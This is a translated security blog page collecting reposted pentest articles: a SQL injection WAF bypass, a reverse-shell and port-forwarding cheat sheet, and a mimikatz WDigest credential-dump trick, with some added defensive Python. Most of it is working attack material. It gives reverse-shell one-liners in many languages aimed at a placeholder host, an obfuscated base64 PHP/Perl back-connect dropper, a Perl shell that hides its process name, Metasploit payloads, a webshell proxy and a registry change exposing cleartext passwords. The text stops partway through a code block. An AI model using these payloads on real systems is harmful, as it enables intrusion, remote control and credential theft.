A general WAF-bypass technique for SQL injection (exploiting a MySQL parsing feature)

Published: June 16, 2015 // Categories: ops work, work log, code study, reposted articles

Straight to the syntax:

select * from users where id=8E0union select 1,2,3,4,5,6,7,8,9,0

select * from users where id=8.0union select 1,2,3,4,5,6,7,8,9,0

select * from users where id=\Nunion select 1,2,3,4,5,6,7,8,9,0

A typical WAF checks for a word boundary around keywords such as union when matching, but these statements happen to defeat that word-boundary check.
I found them by fuzzing; as far as I understand, the parser treats the floating-point exponent as ending its token, and the statement that follows is then executed directly.

In addition, the official documentation shows that \N is equivalent to NULL; this property can be used to bypass many WAFs.

9.1.7 NULL Values
The NULL value means “no data.” NULL can be written in any lettercase. A synonym is \N (case sensitive).
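As an added illustration (not part of the original post), the Python below shows why a word-boundary rule misses these three statements and what a lexer-aware check looks like, then the fix that makes the question moot: binding the value as a parameter. The tokenizer is a deliberate simplification of MySQL's lexer, SQLite stands in for MySQL in the parameterized lookup (assumption: MySQL drivers bind the same way), and the users table is constructed sample data.

```python
import re
import sqlite3

# Naive WAF-style rule: the keyword must sit between word boundaries.
NAIVE_RULE = re.compile(r"\bunion\s+(?:all\s+|distinct\s+)?select\b", re.IGNORECASE)

# Simplified tokenizer (an approximation of MySQL's lexer, not a port of it):
# a numeric literal or the \N NULL synonym is complete as soon as the next
# character cannot extend it, so "8E0union" lexes as "8E0" then "union".
TOKEN_RE = re.compile(r"""
    (?P<num>\d+(?:\.\d*)?(?:[eE][+-]?\d+)?)  # 8, 8.0, 8E0, 1.5e-3 ...
  | (?P<null>\\N)                             # \N, MySQL's synonym for NULL
  | (?P<ident>[A-Za-z_][A-Za-z0-9_$]*)        # identifier or keyword
  | (?P<string>'(?:[^'\\]|\\.)*')             # single-quoted string literal
  | (?P<ws>\s+)
  | (?P<other>.)                              # any other single character
""", re.VERBOSE | re.DOTALL)

PAYLOADS = [  # the three statements from the post
    "select * from users where id=8E0union select 1,2,3,4,5,6,7,8,9,0",
    "select * from users where id=8.0union select 1,2,3,4,5,6,7,8,9,0",
    "select * from users where id=\\Nunion select 1,2,3,4,5,6,7,8,9,0",
]
INJECTED_VALUE = "8E0union select 1,2,3"   # what arrives in the id parameter


def naive_rule(sql):
    """Word-boundary match, the rule the post's statements slip past."""
    return bool(NAIVE_RULE.search(sql))


def tokenize(sql):
    """(kind, text) pairs with whitespace dropped."""
    return [(m.lastgroup, m.group()) for m in TOKEN_RE.finditer(sql)
            if m.lastgroup != "ws"]


def lexer_aware_rule(sql):
    """True when the token stream contains UNION [ALL|DISTINCT] SELECT,
    regardless of which character precedes the keyword."""
    words = [t.lower() for kind, t in tokenize(sql) if kind == "ident"]
    for i, w in enumerate(words):
        if w != "union":
            continue
        rest = words[i + 1:i + 3]
        if not rest:
            continue
        if rest[0] == "select" or (rest[0] in ("all", "distinct") and rest[1:] == ["select"]):
            return True
    return False


def lookup_user_parameterized(user_input):
    """The actual fix: bind the value instead of splicing it into the SQL.
    SQLite stands in for MySQL here; the users table is constructed data."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", [(8, "alice"), (9, "bob")])
    # the whole string is compared against the id column as one value;
    # "8E0union ..." is not a number, so it matches no row
    rows = conn.execute("SELECT name FROM users WHERE id = ?", (user_input,)).fetchall()
    conn.close()
    return [name for (name,) in rows]


if __name__ == "__main__":
    for p in PAYLOADS:
        print("naive=%-5s lexer-aware=%-5s  %s" % (naive_rule(p), lexer_aware_rule(p), p))
    print("bound parameter lookup:", lookup_user_parameterized(INJECTED_VALUE))
```

The tokenizer check is only a hardening layer for a WAF or log rule; the parameterized query is what removes the problem, because the value never reaches the SQL parser as syntax.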

Penetration testing: a summary of reverse shells and port forwarding

Published: June 16, 2015 // Categories: linux, reposted articles

0x00 Introduction

When a penetration test reaches a Linux server, the obvious next step is to bounce a shell back to the local machine for privilege-escalation attempts such as overflows. The various ways of reverse-connecting, forwarding and proxying that this involves are briefly summarised in this article.

0x01 Reverse shells
1) Bash

On some Linux distributions, Bash can directly send a reverse shell to a given IP and port:

bash -i >& /dev/tcp/x.x.x.x/2333 0>&1
2) NetCat

Netcat is another common tool for reverse shells; the classic option is -e:

nc -e /bin/sh x.x.x.x 2333

Some nc builds (non-traditional versions) lack the -e option, in which case the following works instead:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc x.x.x.x 2333 >/tmp/f

Or listen on two local ports and connect them with a pipe, one for input and one for output:

nc x.x.x.x 2333|/bin/sh|nc x.x.x.x 2444

Other approaches follow the same idea, for example replacing nc with telnet:

mknod backpipe p && telnet x.x.x.x 2333 0<backpipe | /bin/bash 1>backpipe
3) PHP

In a PHP environment we used to rely on the built-in back-connect of shells such as phpspy. Here the back-connect part is extracted on its own: requesting the file sends an ordinary interactive shell to the specified IP and port.

<?php 
function which($pr) { 
    $path = execute("which $pr");
    return ($path ? $path : $pr);
}
function execute($cfe) { 
$res = ''; 
if ($cfe) { 
if(function_exists('exec')) { 
@exec($cfe,$res); 
$res = join("\n",$res); 
} elseif(function_exists('shell_exec')) { 
$res = @shell_exec($cfe); 
} elseif(function_exists('system')) { 
@ob_start(); 
@system($cfe); 
$res = @ob_get_contents(); 
@ob_end_clean(); 
} elseif(function_exists('passthru')) { 
@ob_start(); 
@passthru($cfe); 
$res = @ob_get_contents(); 
@ob_end_clean(); 
} elseif(@is_resource($f = @popen($cfe,"r"))) { 
$res = ''; 
while(!@feof($f)) { 
$res .= @fread($f,1024); 
} 
@pclose($f); 
} 
} 
return $res; 
} 

function cf($fname,$text){ 
if($fp=@fopen($fname,'w')) { 
@fputs($fp,@base64_decode($text)); 
@fclose($fp); 
} 
} 

$yourip = "x.x.x.x"; 
$yourport = "2333"; 
$usedb = array('perl'=>'perl','c'=>'c');    $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj". 
"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR". 
"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT". 
"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI". 
"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi". 
"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl". 
"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; 
cf('/tmp/.bc',$back_connect); 
$res = execute(which('perl')." /tmp/.bc $yourip $yourport &"); 
?>

Request it and the shell comes back.

Note that the exec functions must not be disabled in PHP. Metasploit payloads also provide reverse-connect scripts of all kinds, e.g.:

msf > msfpayload php/reverse_php LHOST=x.x.x.x LPORT=2333 R > re.php

The generated file content looks like this.

Upload the file through the shell, then start a handler in msf:

msf > use multi/handler
msf exploit(handler) > set PAYLOAD php/reverse_php
msf exploit(handler) > set LHOST x.x.x.x
msf exploit(handler) > set LPORT 2333
msf exploit(handler) > exploit

Now requesting re.php sends a shell back to the local machine.

Listening on the port directly with nc also works, of course.

Other options include msf encoding and obfuscation; there is also a script on GitHub that can serve as a reference:
https://github.com/keshy/cwg_tools/blob/master/php-reverse-shell.php

4) JSP

JSP is similar; generate a reverse shell with msf:

msfpayload java/jsp_shell_reverse_tcp LHOST=x.x.x.x R > re.jsp

Then start a handler in msf:

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD java/jsp_shell_reverse_tcp
msf exploit(handler) > set LHOST 192.168.10.1
msf exploit(handler) > exploit

The shell comes back the same way.

5) Python

A demo of a Python reverse shell:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("x.x.x.x",2333));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Written out cleanly, the Python looks like this and is easier to follow:

import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("x.x.x.x",2333))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"]);

Other scripts look like this:

python -c "exec(\"import socket, subprocess;s = socket.socket();s.connect(('x.x.x.x',2333))\nwhile 1:  proc = subprocess.Popen(s.recv(1024), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE);s.send(proc.stdout.read()+proc.stderr.read())\")"

msf's payload offers this solution:

msfvenom -f raw -p python/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=2333

The generated, encoded file:

import base64; exec(base64.b64decode('aW1wb3J0IHNvY2tldCxzdHJ1Y3QKcz1zb2NrZXQuc29ja2V0KDIsMSkKcy5jb25uZWN0KCgnMC4wLjAuMCcsMjMzMykpCmw9c3RydWN0LnVucGFjaygnPkknLHMucmVjdig0KSlbMF0KZD1zLnJlY3YoNDA5NikKd2hpbGUgbGVuKGQpIT1sOgoJZCs9cy5yZWN2KDQwOTYpCmV4ZWMoZCx7J3MnOnN9KQo='))

After Base64 decoding:

import socket,struct
s=socket.socket(2,1)
s.connect(('x.x.x.x',2333))
l=struct.unpack('>I',s.recv(4))[0]
d=s.recv(4096)
while len(d)!=l:
    d+=s.recv(4096)
exec(d,{'s':s})

Here I add phith0n's forward-connecting bind_shell.

A few points to note about interactive bind shells:

1. Whether on Linux or Windows, to be interactive you can only start a single shell; you must not start a new shell process for every command received and execute it there.

2. On Windows, cmd.exe's /K switch keeps cmd running, while /c exits after the command completes; note the difference.

Final Windows version:

from socket import *
import subprocess
import os, threading

def send(talk, proc):
        import time
        while True:
                msg = proc.stdout.readline()
                talk.send(msg)

if __name__ == "__main__":
        server=socket(AF_INET,SOCK_STREAM)
        server.bind(('0.0.0.0',23333))
        server.listen(5)
        print 'waiting for connect'
        talk, addr = server.accept()
        print 'connect from',addr
        proc = subprocess.Popen('cmd.exe /K', stdin=subprocess.PIPE, 
                stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
        t = threading.Thread(target = send, args = (talk, proc))
        t.setDaemon(True)
        t.start()
        while True:
                cmd=talk.recv(1024)
                proc.stdin.write(cmd)
                proc.stdin.flush()
        server.close()

Linux version:

from socket import *
import subprocess
import os, threading, sys, time

if __name__ == "__main__":
    server=socket(AF_INET,SOCK_STREAM)
    server.bind(('0.0.0.0',11))
    server.listen(5)
    print 'waiting for connect'
    talk, addr = server.accept()
    print 'connect from',addr
    proc = subprocess.Popen(["/bin/sh","-i"],stdin=talk,stdout=talk, stderr=talk, shell=True)

Run it, then connect to it actively.

6) Perl

First a script based on the same principle:

perl -e 'use Socket;$i="x.x.x.x";$p=2333;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Then a method that does not depend on calling /bin/bash:

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"x.x.x.x:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

A complete reverse-shell .pl script:

#!/usr/bin/perl -w
# perl-reverse-shell - A Reverse Shell implementation in PERL
use strict;
use Socket;
use FileHandle;
use POSIX;
my $VERSION = "1.0";
# Where to send the reverse shell.  Change these.
my $ip = 'x.x.x.x';
my $port = 2333;

# Options
my $daemon = 1;
my $auth   = 0; # 0 means authentication is disabled and any 
        # source IP can access the reverse shell
my $authorised_client_pattern = qr(^127\.0\.0\.1$);

# Declarations
my $global_page = "";
my $fake_process_name = "/usr/sbin/apache";

# Change the process name to be less conspicious
$0 = "[httpd]";

# Authenticate based on source IP address if required
if (defined($ENV{'REMOTE_ADDR'})) {
    cgiprint("Browser IP address appears to be: $ENV{'REMOTE_ADDR'}");

    if ($auth) {
        unless ($ENV{'REMOTE_ADDR'} =~ $authorised_client_pattern) {
            cgiprint("ERROR: Your client isn't authorised to view this page");
            cgiexit();
        }
    }
} elsif ($auth) {
    cgiprint("ERROR: Authentication is enabled, but I couldn't determine your IP address.  Denying access");
    cgiexit(0);
}

# Background and dissociate from parent process if required
if ($daemon) {
    my $pid = fork();
    if ($pid) {
        cgiexit(0); # parent exits
    }

    setsid();
    chdir('/');
    umask(0);
}

# Make TCP connection for reverse shell
socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
if (connect(SOCK, sockaddr_in($port,inet_aton($ip)))) {
    cgiprint("Sent reverse shell to $ip:$port");
    cgiprintpage();
} else {
    cgiprint("Couldn't open reverse shell to $ip:$port: $!");
    cgiexit();    
}

# Redirect STDIN, STDOUT and STDERR to the TCP connection
open(STDIN, ">&SOCK");
open(STDOUT,">&SOCK");
open(STDERR,">&SOCK");
$ENV{'HISTFILE'} = '/dev/null';
system("w;uname -a;id;pwd");
exec({"/bin/sh"} ($fake_process_name, "-i"));

# Wrapper around print
sub cgiprint {
    my $line = shift;
    $line .= "<p>\n";
    $global_page .= $line;
}

# Wrapper around exit
sub cgiexit {
    cgiprintpage();
    exit 0; # 0 to ensure we don't give a 500 response.
}

# Form HTTP response using all the messages gathered by cgiprint so far
sub cgiprintpage {
    print "Content-Length: " . length($global_page) . "\r
Connection: close\r
Content-Type: text\/html\r\n\r\n" . $global_page;
}

How to run PerlScript in an ASP environment:

<%@Language=PerlScript%>
# declares that the scripting language of this ASP page is PerlScript
<%
system("c://Recycler//cmd.exe /c c://Recycler//nc.exe -e cmd.exe -v x.x.x.x 443");
# runs the command through the system function
#exec("c://Recycler//cmd.exe /c c://Recycler//nc.exe -e cmd.exe -v x.x.x.x 443");
# runs the command through the exec function
%>
7) Ruby

As usual, first one that calls /bin/sh:

ruby -rsocket -e'f=TCPSocket.open("x.x.x.x",2333).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

A reverse shell that does not depend on /bin/sh:

ruby -rsocket -e 'exit if fork;c=TCPSocket.new("x.x.x.x","2333");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

For Windows environments:

ruby -rsocket -e 'c=TCPSocket.new("x.x.x.x","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

MSF also has a corresponding module, so no more on that.

8) Java

A script that calls /bin/bash:

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/x.x.x.x/2333;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

MSF also has a corresponding module.

9) Lua
lua -e "require('socket');require('os');t=socket.tcp();t:connect('x.x.x.x','2333');os.execute('/bin/sh -i <&3 >&3 2>&3');"

Same idea, no explanation needed.
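Every variant in 0x01, whichever language it is written in, ends as a shell or interpreter whose stdin, stdout and stderr are one and the same TCP socket; the fifo-based nc variants are the exception, where only the nc process holds the socket. The Python below, added here and not part of the original article, turns that shape into a host check over /proc: a pure function over a snapshot so it can be tested on constructed data, plus the reader for a live /proc tree. The process-name list, the sample snapshot and the temporary fake /proc tree are assumptions made for this example.

```python
import os
import re
import shutil
import tempfile

# Names commonly seen hosting a reverse shell (assumption for the example).
SHELLS = {"sh", "bash", "dash", "ash", "zsh", "ksh", "python", "python2",
          "python3", "perl", "ruby", "php", "lua", "nc", "ncat", "netcat",
          "telnet", "socat"}
SOCKET_RE = re.compile(r"^socket:\[\d+\]$")   # readlink() result for a socket fd


def suspicious_processes(snapshot, names=SHELLS):
    """snapshot: {pid: {"comm": name, "fd": {0: target, 1: target, 2: target}}}
    as produced by read_proc_snapshot().  Returns pids whose stdin, stdout
    and stderr all resolve to the same socket inode.  With the default
    `names` the hit is limited to shells and interpreters; names=None
    reports every process with that fd shape (inetd-style services have
    it legitimately, and the post's Perl script renames itself, so the
    fd shape is the stronger signal and the name only a second one)."""
    hits = []
    for pid, info in snapshot.items():
        fds = info.get("fd", {})
        std = [fds.get(n, "") for n in (0, 1, 2)]
        if not all(SOCKET_RE.match(t) for t in std):
            continue
        if len(set(std)) != 1:            # three different sockets: another shape
            continue
        if names is None or info.get("comm", "") in names:
            hits.append(pid)
    return sorted(hits)


def read_proc_snapshot(proc="/proc"):
    """Walk a /proc-style tree and collect comm plus the link targets of
    fds 0-2 for every pid.  Reading other users' fd links needs root;
    unreadable entries are skipped rather than reported."""
    snapshot = {}
    for entry in os.listdir(proc):
        if not entry.isdigit():
            continue
        base = os.path.join(proc, entry)
        try:
            with open(os.path.join(base, "comm")) as f:
                comm = f.read().strip()
        except OSError:
            continue
        fds = {}
        for n in (0, 1, 2):
            try:
                fds[n] = os.readlink(os.path.join(base, "fd", str(n)))
            except OSError:
                pass
        snapshot[int(entry)] = {"comm": comm, "fd": fds}
    return snapshot


# Constructed sample snapshot, not captured from a real host.
SAMPLE_SNAPSHOT = {
    1001: {"comm": "sh",      "fd": {0: "socket:[48213]", 1: "socket:[48213]", 2: "socket:[48213]"}},
    1002: {"comm": "bash",    "fd": {0: "/dev/pts/0", 1: "/dev/pts/0", 2: "/dev/pts/0"}},
    1003: {"comm": "nginx",   "fd": {0: "/dev/null", 1: "/var/log/nginx/access.log", 2: "/var/log/nginx/error.log"}},
    1004: {"comm": "sshd",    "fd": {0: "/dev/null", 1: "/dev/null", 2: "/dev/null"}},
    1005: {"comm": "python3", "fd": {0: "socket:[48977]", 1: "socket:[48977]", 2: "socket:[48977]"}},
    1006: {"comm": "nc",      "fd": {0: "socket:[49001]", 1: "pipe:[49002]", 2: "/dev/pts/1"}},   # fifo variant
    1007: {"comm": "in.telnetd", "fd": {0: "socket:[50100]", 1: "socket:[50100]", 2: "socket:[50100]"}},
}


def detect_in_fake_proc():
    """Build a throwaway /proc look-alike (constructed, not a real host):
    pid 4242 is an 'sh' with all three std fds on socket inode 7, pid 4243
    a 'bash' on a pty.  Returns what the detector reports for that tree."""
    root = tempfile.mkdtemp()
    layout = {4242: ("sh", ["socket:[7]"] * 3), 4243: ("bash", ["/dev/pts/0"] * 3)}
    for pid, (comm, targets) in layout.items():
        fd_dir = os.path.join(root, str(pid), "fd")
        os.makedirs(fd_dir)
        with open(os.path.join(root, str(pid), "comm"), "w") as f:
            f.write(comm + "\n")
        for n, target in enumerate(targets):
            os.symlink(target, os.path.join(fd_dir, str(n)))   # dangling link, as in /proc
    try:
        return suspicious_processes(read_proc_snapshot(root))
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    for pid in suspicious_processes(read_proc_snapshot()):
        print("shell bound to a socket: pid", pid)
```

The mkfifo and two-nc pipelines do not match this shape (pid 1006 above): the shell's fds are a fifo and a pipe, and only nc owns the socket. For those, correlate a shell whose stdin is a fifo or pipe with an nc or telnet process in the same session instead.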

0x02 Port forwarding

The above summarises the known mainstream and less mainstream ways of getting a reverse shell; now a few words on port forwarding.
Well-known approaches include:

  • lcx, the veteran tool
  • htran/fport/fpipe and the like
  • antifw, which moves port 3389 to 80
  • reduh, which offers another way to reach 3389 through an http/https tunnel
  • tunna, a more stable and faster solution than reduh

On Linux, a script in Perl, Python or similar can be used instead.
Knownsec once published an rtcp.py script for forwarding, but testing showed it only supports a single connection. The following script is recommended instead; it supports multiple clients at once:

#!/usr/bin/env python
# -*- coding: utf-8 -*-

import sys
import socket
import threading
import logging
import optparse


class PipeThread(threading.Thread):

    def __init__(self, source_fd, target_fd):
        super(PipeThread, self).__init__()
        self.logger = logging.getLogger('PipeThread')
        self.source_fd = source_fd
        self.target_fd = target_fd
        self.source_addr = self.source_fd.getpeername()
        self.target_addr = self.target_fd.getpeername()

    def run(self):
        while True:
            try:
                data = self.source_fd.recv(4096)
                if len(data) > 0:
                    self.logger.debug('read  %04i from %s:%d', len(data),
                                      self.source_addr[0], self.source_addr[1])
                    sent = self.target_fd.send(data)
                    self.logger.debug('write %04i to   %s:%d', sent,
                                      self.target_addr[0], self.target_addr[1])
                else:
                    break
            except socket.error:
                break
        self.logger.debug('connection %s:%d is closed.', self.source_addr[0],
                          self.source_addr[1])
        self.logger.debug('connection %s:%d is closed.', self.target_addr[0],
                          self.target_addr[1])
        self.source_fd.close()
        self.target_fd.close()


class Forwarder(object):

    def __init__(self, ip, port, remoteip, remoteport, backlog=5):
        self.remoteip = remoteip
        self.remoteport = remoteport
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.sock.bind((ip, port))
        self.sock.listen(backlog)

    def run(self):
        while True:
            client_fd, client_addr = self.sock.accept()
            target_fd = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            target_fd.connect((self.remoteip, self.remoteport))

            threads = [
                PipeThread(client_fd, target_fd),
                PipeThread(target_fd, client_fd)
            ]

            for t in threads:
                t.setDaemon(True)
                t.start()

    def __del__(self):
        self.sock.close()


if __name__ == '__main__':
    parser = optparse.OptionParser()

    parser.add_option(
        '-l', '--local-ip', dest='local_ip',
        help='Local IP address to bind to')
    parser.add_option(
        '-p', '--local-port',
        type='int', dest='local_port',
        help='Local port to bind to')
    parser.add_option(
        '-r', '--remote-ip', dest='remote_ip',
        help='Remote IP address to forward to')
    parser.add_option(
        '-P', '--remote-port',
        type='int', dest='remote_port',
        help='Remote port to bind to')
    parser.add_option(
        '-v', '--verbose',
        action='store_true', dest='verbose',
        help='verbose')
    opts, args = parser.parse_args()

    if len(sys.argv) == 1 or len(args) > 0:
        parser.print_help()
        exit()

    if not (opts.local_ip and opts.local_port and opts.remote_ip and opts.remote_port):
        parser.print_help()
        exit()

    if opts.verbose:
        log_level = logging.DEBUG
    else:
        log_level = logging.CRITICAL

    logging.basicConfig(level=log_level, format='%(name)-11s: %(message)s')
    forwarder = Forwarder(opts.local_ip, opts.local_port, opts.remote_ip, opts.remote_port)

    try:
        forwarder.run()
    except KeyboardInterrupt:
        print('quit')
        exit()

Usage, for example:

python xxx.py -l 0.0.0.0 -p 3389 -r x.x.x.x -P 443

As for Perl scripts, there is related material online that you can adapt yourself.

0x03 Opening a proxy

If you already have fairly high privileges on the target server, you can add a VPN or SOCKS proxy. A usable socks.py script written by ringzero@557.im makes adding a SOCKS proxy easier.
Usage, for example:

nohup python s5.py 1080 &

When you only have a webshell and need to test a web service on the internal network, but lack the energy to craft every request by hand through the webshell, the process needs to be automated. xsjswt proposed the following approach.

Drop the following script onto the server with shell privileges:

<?php
if(!isset($_GET['url'])){
  exit(0);
}
$ch = curl_init();
$url=$_GET['url'];
if(strstr($url,'?')){
  $url.='&';
}
else{
  $url.='?';
}
unset($_GET['url']);
foreach($_GET as $Key=>$Val){
  if(get_magic_quotes_gpc()){
    $Val=stripslashes($Val);
  }
  $url=$url.'&'.$Key.'='.urlencode($Val);
}
$cookie='';
foreach($_COOKIE as $Key=>$Val){
  if(get_magic_quotes_gpc()){
    $Val=stripslashes($Val);
  }
  $cookie=$cookie.$Key.'='.urlencode($Val).'; ';
}
if($_SERVER['REQUEST_METHOD']=="POST"){
  curl_setopt($ch, CURLOPT_POST, 1);
  $post_data='';
  foreach($_POST as $Key=>$Val){
    if(get_magic_quotes_gpc()){
      $Val=stripslashes($Val);
    }
    $post_data=$post_data.'&'.$Key.'='.urlencode($Val);
  }
  curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
}
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
curl_setopt($ch, CURLOPT_COOKIE, $cookie);
curl_setopt($ch, CURLOPT_HEADER, TRUE);
curl_setopt($ch, CURLOPT_NOBODY, FALSE);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
if(isset($_SERVER['HTTP_REFERER'])){
  curl_setopt($ch, CURLOPT_REFERER, $_SERVER['HTTP_REFERER']);
}
$Response=curl_exec($ch);
if(!$Response){
  curl_close($ch);
  exit(0);
}
$HttpStatus=curl_getinfo($ch,CURLINFO_HTTP_CODE);
$Header=substr($Response,0,curl_getinfo($ch, CURLINFO_HEADER_SIZE));
$Body=substr($Response,curl_getinfo($ch, CURLINFO_HEADER_SIZE));
$Headers=split("\r\n",$Header);
foreach($Headers as $ThusHead){
  if($ThusHead == 'Transfer-Encoding: chunked' || strstr($ThusHead,'Content-Length')!==false){
     continue;
  }
  header($ThusHead,FALSE);
}
echo $Body;
curl_close($ch);
?>

Then set up an nginx server with the following configuration:

server {
    listen          监听端口;
    location ~ () {
            proxy_pass              http://shell-ip/文件存放目录/proxy.php?url=http://$host/$request_uri;
            proxy_set_header        Host    "访问webshell所用域名";
    }
}

Reload the nginx configuration and point the local browser's HTTP proxy at the nginx server's IP and listening port to get basic proxied requests.

0x04 Summary

This only summarises common methods, tools and scripts and tests them. If you have met unusual environments or more interesting ideas and techniques in practice, please share them.

0x05 References

[1] http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

[2] http://www.leavesongs.com/PYTHON/python-shell-backdoor.html

[3] http://www.waitalone.cn/linux-shell-rebound-under-way.html

[4] http://tool.p1ng.pw/getshell.html

[5] Other related material on the Internet

Dumping WDigest Creds with Meterpreter Mimikatz/Kiwi in Windows 8.1

Published: June 11, 2015 // Categories: windows, reposted articles

Many of us in the penetration testing world have come to love Benjamin Delpy’s (blog.gentilkiwi.com) mimikatz/kiwi modules which were ported to Metasploit by OJ Reeves and incorporated into the meterpreter shell. Among other capabilities, one of the most impactful features of these modules was the ability to extract a Windows user’s clear text password from the WDigest provider.

When Microsoft released Windows 8.1, they added some security features that effectively removed the ability of tools like mimikatz or WCE to dump clear text credentials from LSA memory.

Microsoft then backported those fixes in a security update (http://support.microsoft.com/kb/2871997) for Windows systems prior to 8.1. However, because WDigest is used by many products (e.g. IIS), Microsoft left the WDigest provider enabled, which is why our mimikatz/kiwi module can still obtain clear text passwords prior to Windows 8.1.

Windows 8.1 introduced a registry setting that allows for disabling the storage of the user’s logon credential in clear text for the WDigest provider.

(HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential)

Although the entry does not appear in the Windows 8.1 registry, the default setting for this DWORD value in 8.1 is “0” meaning that 8.1 does not store logon credentials in clear text in LSA memory for this SSP.

KB2871997 backported this registry setting to earlier Windows versions. When you install the hotfix, the registry setting will also not appear in earlier versions. These versions < 8.1 will default to “1” for the “UseLogonCredential” DWORD value.

So what happens on a Windows 8.1 system when we try to obtain the clear text password via a meterpreter shell using the mimikatz or kiwi modules?

The kiwi module is unable to obtain the clear text passwords from LSA memory.

But since we have administrative access, let’s change the registry setting by explicitly setting it to 1 in a Windows shell.

(reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1)

We refresh the regedit window to see the new value of “1” for UseLogonCredential.

Now, all we have to do is try to force, or wait for the user to either lock their screen or log off and then subsequently unlock their screen or log back in.

With the update to the registry, we should now be able to grab the clear text password from LSA memory.

Back in our meterpreter shell, we attempt the creds_wdigest again (might have to get a new meterpreter shell if the user logged off and back on).

References:

http://blog.gentilkiwi.com
http://blogs.technet.com/b/kfalde/archive/2014/11/01/kb2871997-and-wdigest-part-1.aspx

In plain terms: modify the registry, adding the "UseLogonCredential" value (it has to be created) under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest as a 32-bit DWORD set to 1. Then, while an administrator is logged on or has not yet logged off, mimikatz can capture the plaintext credentials.

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1
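The same registry write, seen from the defender's side. The Python below is an added example, not part of the reposted article: it flags Sysmon-style registry SetValue events that turn UseLogonCredential on, and interprets an audited value according to the version rules the post describes (absent means 0 on Windows 8.1, but 1 on pre-8.1 hosts with KB2871997). The JSON record layout and the events themselves are constructed for this example, not copied from a real host.

```python
import json
import re

# Match the value path regardless of hive spelling (HKLM\System vs HKEY_LOCAL_MACHINE\SYSTEM).
TARGET_RE = re.compile(r"\\SecurityProviders\\WDigest\\UseLogonCredential$", re.IGNORECASE)
# Sysmon renders DWORD data as "DWORD (0x00000001)"; capture the hex digits.
DETAILS_RE = re.compile(r"DWORD \(0x([0-9A-Fa-f]{8})\)")

# Constructed Sysmon-like records (Event ID 13 = registry value set), one JSON
# object per line.  Field names follow Sysmon's; the values are made up.
SAMPLE_LOG = r"""
{"EventID": 13, "EventType": "SetValue", "Image": "C:\\Windows\\System32\\reg.exe", "User": "CORP\\jdoe", "TargetObject": "HKLM\\System\\CurrentControlSet\\Control\\SecurityProviders\\WDigest\\UseLogonCredential", "Details": "DWORD (0x00000001)"}
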